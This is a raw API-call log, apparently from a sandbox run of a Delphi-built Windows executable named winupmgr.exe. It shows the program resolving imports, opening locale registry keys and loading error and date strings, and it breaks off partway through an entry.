[0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalSize") returned 0x76d5d16f [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 0x76d4e29e [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0103.221] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.221] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0103.224] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0103.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExA") returned 0x777214b3 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExA") returned 0x77721469 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0103.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0103.224] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="UnrealizeObject") returned 0x770bc9ae [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="SetROP2") returned 0x770bbc54 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SelectPalette") returned 0x770b5a86 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="MoveToEx") returned 0x770b8ee6 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextMetricsA") returned 0x770bd1f1 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetSystemPaletteEntries") returned 0x770bcf02 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetStockObject") returned 0x770b4eb8 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentPositionEx") returned 0x770b908b [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePenIndirect") returned 0x770c1feb [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePalette") returned 0x770b795a [0103.226] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontIndirectA") returned 0x770bcffd [0103.226] GetProcAddress (hModule=0x770a0000, lpProcName="CreateBrushIndirect") returned 0x770bb385 [0103.226] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayPtrOfIndex") returned 0x76e5e1ce [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetUBound") returned 0x76e5e127 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetLBound") returned 0x76e5e173 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayCreate") returned 0x76e5e263 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeType") returned 0x76e45dee [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantCopy") returned 0x76e448f1 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantInit") returned 0x76e43ed5 [0103.226] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SysFreeString") returned 0x76e43e59 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SysReAllocStringLen") returned 0x76e47810 [0103.227] GetProcAddress (hModule=0x76e40000, lpProcName="SysAllocStringLen") returned 0x76e445d2 [0103.227] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0103.227] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0103.227] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="SetClipboardData") returned 0x77188e57 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="OpenClipboard") returned 0x77158ecb [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColor") returned 0x77146c3c [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetOpenClipboardWindow") returned 0x7715c468 [0103.227] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="GetClipboardData") returned 0x77189f1d [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="EmptyClipboard") returned 0x771a7cb9 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CloseClipboard") returned 0x77158e8d [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharUpperBuffA") returned 0x7714fe47 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0103.228] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0103.228] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0103.228] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0103.229] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0103.229] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0103.229] GetKeyboardType (nTypeFlag=0) returned 4 [0103.229] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe\" " [0103.229] GetStartupInfoA (in: lpStartupInfo=0x18fef4 | out: lpStartupInfo=0x18fef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0103.229] GetVersion () returned 0x1db10106 [0103.229] GetVersion () returned 0x1db10106 [0103.229] GetCurrentThreadId () returned 0x7c4 [0103.229] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f0, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0x3a [0103.229] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8cb, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe")) returned 0x3a [0103.229] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.229] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.230] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0103.230] lstrcpynA (in: lpString1=0x18f8cb, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" [0103.230] GetThreadLocale () returned 0x409 [0103.230] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9db, cchData=5 | out: lpLCData="ENU") returned 4 [0103.233] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned 58 [0103.233] lstrcpynA (in: lpString1=0x18f902, lpString2="ENU", iMaxLength=206 | out: lpString1="ENU") returned="ENU" [0103.233] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0103.233] lstrcpynA (in: lpString1=0x18f902, lpString2="EN", iMaxLength=206 | out: lpString1="EN") returned="EN" [0103.233] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0103.234] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0103.234] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x6066e0 [0103.234] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1c80000 [0103.234] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x6076e0 [0103.234] VirtualAlloc (lpAddress=0x1c80000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c80000 [0103.234] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xfff0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0103.235] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0103.235] GetVersionExA (in: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18ff44, dwMinorVersion=0x77cb1ecd, dwBuildNumber=0x10d9fa, dwPlatformId=0xfffffffe, szCSDVersion="vkÇw'\x0fÔv\x18\x03áv P`") | out: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0103.236] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0103.236] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0103.236] GetThreadLocale () returned 0x409 [0103.236] GetThreadLocale () returned 0x409 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jan") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd70, cchData=256 | out: lpLCData="January") returned 8 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Feb") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd70, cchData=256 | out: lpLCData="February") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mar") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="March") returned 6 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Apr") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="April") returned 6 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jun") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="June") returned 5 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jul") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="July") returned 5 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Aug") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="August") returned 7 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sep") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd70, cchData=256 | out: lpLCData="September") returned 10 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Oct") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd70, cchData=256 | out: lpLCData="October") returned 8 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Nov") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd70, cchData=256 | out: lpLCData="November") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Dec") returned 4 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd70, cchData=256 | out: lpLCData="December") returned 9 [0103.236] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sun") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sunday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mon") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Monday") returned 7 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tue") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tuesday") returned 8 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wed") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wednesday") returned 10 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thu") returned 4 [0103.237] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thursday") returned 9 [0103.237] GetLocaleInfoA (in: 